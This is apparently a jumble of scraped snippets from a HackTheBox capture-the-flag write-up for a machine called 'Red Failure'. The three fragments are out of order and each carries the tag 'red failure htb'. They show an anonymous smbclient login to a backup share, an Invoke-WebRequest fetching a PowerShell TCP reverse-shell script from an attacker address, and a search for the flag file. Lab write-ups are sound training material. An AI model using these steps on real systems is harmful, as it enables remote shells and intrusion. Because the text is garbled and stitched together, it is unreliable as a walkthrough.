Get-ChildItem -Path C:\Users\Administrator\Desktop -Filter *flag* Voilà! We've successfully exploited the Red Failure machine and obtained the flag.
smbclient //10.10.11.193/backup -U anonymous Once inside the share, we find a file called backup.zip . We can download the file and attempt to unzip it: red failure htb
Invoke-WebRequest -Uri http://10.10.16.38:8080/Invoke-PowerShellTcpip.ps1 -OutFile Invoke-PowerShellTcpip.ps1 Then: red failure htb